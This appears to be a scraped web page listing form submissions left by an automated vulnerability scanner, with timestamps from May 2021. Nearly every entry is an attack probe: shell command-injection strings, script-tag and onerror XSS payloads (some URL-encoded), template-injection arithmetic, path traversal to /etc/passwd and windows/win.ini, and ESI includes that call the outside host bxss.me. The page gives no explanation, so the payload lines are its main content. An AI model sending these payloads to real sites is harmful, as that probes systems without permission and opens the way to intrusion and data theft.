 • |echo ydhfne$()\ bbnnwy\nz^xyu||a #' |echo ydhfne$()\ bbnnwy\nz^xyu||a #|" |echo ydhfne$()\ bbnnwy\nz^xyu||a #

  2021-05-06 03:14:30


  1


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 03:14:30


  1


 • echo wrdvui$()\ iiyvtw\nz^xyu||a #' &echo wrdvui$()\ iiyvtw\nz^xyu||a #|" &echo wrdvui$()\ iiyvtw\nz^xyu||a #

  2021-05-06 03:14:29


  1


 • pHqghUme

  2021-05-06 03:14:29


  1


 • pHqghUme

  2021-05-06 03:14:28


  1


 • pHqghUme

  2021-05-06 03:14:28


  1


 • pHqghUme

  2021-05-06 03:14:28


  1


 • pHqghUme

  2021-05-06 03:14:27


  1


 • pHqghUme

  2021-05-06 03:14:26


  1


 • pHqghUme<isindex type=image src=1 onerror=igKc(9550)>

  2021-05-06 03:14:26


  1


 • pHqghUme

  2021-05-06 03:14:26


  1


 • pHqghUme

  2021-05-06 03:14:25


  1


 • pHqghUme

  2021-05-06 03:14:25


  1


 • pHqghUme

  2021-05-06 03:14:24


  1


 • pHqghUme

  2021-05-06 03:14:24


  1


 • pHqghUme

  2021-05-06 03:14:24


  1


 • pHqghUme

  2021-05-06 03:14:23


  1


 • pHqghUme

  2021-05-06 03:14:23


  1


 • pHqghUme

  2021-05-06 03:14:21


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%4B%51%47%4B%28%39%30%30%30%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 03:14:20


  1


 • TUJTc1d6aEQ=

  2021-05-06 03:14:20


  1


 • pHqghUme

  2021-05-06 03:14:19


  1


 • pHqghUme

  2021-05-06 03:14:19


  1


 • pHqghUme

  2021-05-06 03:14:18


  ${9999728+9999664}


 • pHqghUme

  2021-05-06 03:14:18


  1


 • ${9999024+10000311}

  2021-05-06 03:14:17


  1


 • pHqghUme

  2021-05-06 03:14:17


  1


 • pHqghUme<ScRiPt >igKc(9018)</ScRiPt>

  2021-05-06 03:14:16


  1


 • pHqghUme

  2021-05-06 03:14:16


  1


 • pHqghUme

  2021-05-06 03:14:16


  1


 • pHqghUme

  2021-05-06 03:14:16


  1


 • pHqghUme

  2021-05-06 03:14:16


  ../1


 • pHqghUme

  2021-05-06 03:14:15


  ../../../../../../../../../../../../../../etc/passwd


 • pHqghUme

  2021-05-06 03:14:15


  ../../../../../../../../../../../../../../windows/win.ini


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 03:14:14


  1


 • pHqghUme

  2021-05-06 03:14:14


  1


 • pHqghUme

  2021-05-06 03:14:14


  1<esi:include src="http://bxss.me/rpb.png"/>


 • ../pHqghUme

  2021-05-06 03:14:14


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 03:14:13


  1


 • pHqghUme

  2021-05-06 03:14:13


  1


 • pHqghUme

  2021-05-06 03:14:13


  1


 • pHqghUme

  2021-05-06 03:14:13


  1<script>KQGK(9837)</script>


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 03:14:13


  1


 • pHqghUme

  2021-05-06 03:14:12


  1


 • pHqghUme

  2021-05-06 03:14:12


  1


 • pHqghUme

  2021-05-06 03:14:12


  1


 • pHqghUme

  2021-05-06 03:14:12


  1


 • pHqghUme

  2021-05-06 03:14:11


  1


 • pHqghUme

  2021-05-06 03:14:11


  1